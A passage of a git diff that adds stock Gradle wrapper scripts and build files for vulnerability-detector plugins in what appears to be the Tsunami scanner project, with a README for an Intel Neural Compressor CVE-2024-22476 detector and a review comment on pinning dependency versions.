app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/gradio_cve_2023_51449/gradlew.bat b/community/detectors/gradio_cve_2023_51449/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/community/detectors/gradio_cve_2023_51449/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
+echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/influxdb_cve_2019_20933/gradlew b/community/detectors/influxdb_cve_2019_20933/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/influxdb_cve_2019_20933/gradlew +++ b/community/detectors/influxdb_cve_2019_20933/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/influxdb_cve_2019_20933/gradlew.bat b/community/detectors/influxdb_cve_2019_20933/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/influxdb_cve_2019_20933/gradlew.bat +++ b/community/detectors/influxdb_cve_2019_20933/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/README.md b/community/detectors/intel_neural_compressor_cve_2024_22476/README.md new file mode 100644 index 000000000..154f94d80 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/README.md @@ -0,0 +1,20 @@ +# Intel(R) Neural Compressor CVE-2024-22476 Detector + +This detector checks for Intel(R) Neural Compressor CVE-2024-22476 +Unauthenticated Remote Code Execution (CVE-2024-22476). Improper input +validation in some Intel(R) Neural Compressor software before version 2.5.0 may +allow an unauthenticated user to potentially enable escalation of privilege via +remote access. + +- https://huntr.com/bounties/877a517f-76ec-45be-8d3b-2b5ac471bfeb +- https://vulners.com/cvelist/CVELIST:CVE-2024-22476 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. 
diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/build.gradle b/community/detectors/intel_neural_compressor_cve_2024_22476/build.gradle
new file mode 100644
index 000000000..d5b080086
--- /dev/null
+++ b/community/detectors/intel_neural_compressor_cve_2024_22476/build.gradle
@@ -0,0 +1,68 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami CVE-2024-22476 VulnDetector plugin.'
+group 'com.google.tsunami'
+version '0.0.1-SNAPSHOT'
+
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ okhttpVersion = '3.12.0'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
\ No newline at end of file
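Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block makes the three `com.google.tsunami` implementation dependencies resolve to whatever release is newest at build time. Two builds of the same commit can therefore produce different plugin jars, and a bad upstream release is pulled in without review. Pinning it, e.g. `tsunamiVersion = '<pinned Tsunami release>'`, keeps the detector build reproducible and auditable. With a dynamic version, `mavenLocal()` in `repositories` also means an artifact in the builder's local repository can be selected, so it is worth confirming that entry is needed outside local development. Separately, `'Built-By': System.getProperty('user.name')` in `jar.manifest` writes the builder's account name into the shipped jar and could be dropped.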
diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.jar b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.properties b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew new file mode 100755 index 000000000..b740cf133 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew 
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
